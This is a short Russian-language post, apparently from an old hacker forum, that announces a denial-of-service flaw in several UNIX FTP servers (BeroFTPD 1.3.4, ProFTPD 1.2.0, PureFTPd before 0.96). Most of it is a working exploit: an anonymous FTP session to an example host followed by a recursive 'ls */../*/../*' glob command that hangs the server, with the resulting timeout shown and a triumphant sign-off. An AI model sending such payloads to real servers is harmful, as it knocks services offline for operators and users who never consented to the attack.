Многие UNIX-овые FTP
сервера имеют ошибку, с помощью которой
легко можно вызвать DoS атаку. Уязвимые
системы:
BeroFTPD версии 1.3.4
Proftpd 1.2.0
PureFTPd (версии до 0.96)
Вероятно также многие другие.
Пример эксплоита
Коннектимся через ftp к
серваку
$ ftp ftp.example.org
...
Name (ftp.example.org:): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
Посылаем строчку
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
Все, система подвешена
421 Service not available, remote server
timed out. Connection closed
Уря товарищи!
